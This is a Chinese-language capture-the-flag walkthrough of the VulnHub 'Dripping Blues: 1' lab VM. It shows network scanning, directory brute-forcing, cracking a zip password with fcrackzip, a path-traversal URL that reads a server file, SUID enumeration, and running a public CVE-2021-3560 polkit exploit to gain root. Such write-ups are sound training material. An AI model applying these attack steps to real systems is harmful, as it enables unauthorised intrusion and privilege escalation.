- 英文名稱:Dripping Blues: 1
- 中文名稱:滴水藍調:1
- 釋出日期:2021 年 9 月 19 日
- 難度:容易
- 描述:關于 vm:測試并從 virtualbox 導出。啟用 dhcp 和嵌套 vtx/amdv。您可以通過電子郵件與我聯系以擷取故障排除或問題。
- 下載下傳位址:https://www.vulnhub.com/entry/dripping-blues-1,744/
ailx10
網絡安全優秀回答者
網絡安全碩士
去咨詢
1、主機發現,IP位址為192.168.199.242
nmap -sP 192.168.199.0/24
Nmap scan report for drippingblues.lan (192.168.199.242)
主機發現
2、端口掃描,發現了21、22、80端口
nmap -A 192.168.199.242
端口掃描
3、web通路
web首頁
4、目錄爆破,發現線索
└─$ dirb http://192.168.199.242/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Aug 21 14:51:29 2022
URL_BASE: http://192.168.199.242/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.199.242/ ----
+ http://192.168.199.242/index.php (CODE:200|SIZE:138)
+ http://192.168.199.242/robots.txt (CODE:200|SIZE:78)
+ http://192.168.199.242/server-status (CODE:403|SIZE:280)
-----------------
END_TIME: Sun Aug 21 14:51:34 2022
DOWNLOADED: 4612 - FOUND: 3
目錄爆破
5、線索提示,去計算ssh的密碼
ssh線索提示
6、挖掘21端口資訊,可以匿名登入,發現respectmydrip.zip檔案 ,下載下傳之後,發現需要密碼才能打開
ftp匿名登入
7、嘗試對檔案進行密碼破解,這裡使用134M的密碼本
rockyou.txt密碼本
8、啟動暴力破解
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u respectmydrip.zip
PASSWORD FOUND!!!!: pw == 072528035
暴力破解密碼
9、使用密碼,解開壓縮封包件,得到一個提示和另一個加密壓縮
just focus on "drip"
得到提示和另一個加密壓縮包
10、嘗試web通路,得到密碼imdrippinbiatch
http://192.168.199.242/index.php?drip=../../../../etc/dripispowerful.html
得到線索
11、根據登入頁面提示,使用者名是thugger
得到使用者名
12、ssh登入,拿到普通使用者的flag
ssh登入成功
普通使用者flag
13、尋找提權點,可疑點/usr/lib/policykit-1/polkit-agent-helper-1
thugger@drippingblues:~$ find / -perm -u=s 2>&1 | grep -v "Permission denied"
/usr/sbin/pppd
/usr/bin/pkexec
/usr/bin/su
/usr/bin/sudo
/usr/bin/umount
/usr/bin/vmware-user-suid-wrapper
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/newgrp
/usr/bin/mount
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/xorg/Xorg.wrap
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
存在polkit程序
14、利用polkid提權漏洞[1]
CVE-2021-3560 是對 polkit 的一種身份驗證繞過,它允許非特權使用者使用 DBus 調用特權方法,在這個漏洞中我們将調用 accountservice 提供的 2 個特權方法(CreateUser 和 SetPassword),這允許我們建立一個特權使用者然後為其設定密碼,最後以建立的使用者身份登入,然後提升為root。
15、scp上傳poc腳本
上傳poc腳本
16、運作腳本,成功拿到root權限,獲得flag
thugger@drippingblues:~$ python3 CVE-2021-3560.py
**************
Exploit: Privilege escalation with polkit - CVE-2021-3560
Exploit code written by Ahmad Almorabea @almorabea
Original exploit author: Kevin Backhouse
For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
**************
[+] Starting the Exploit
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user
Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required
........
獲得root權限
到此,實驗完成~
參考
- ^Polkit-exploit https://github.com/Almorabea/Polkit-exploit
釋出于 2022-08-21 16:29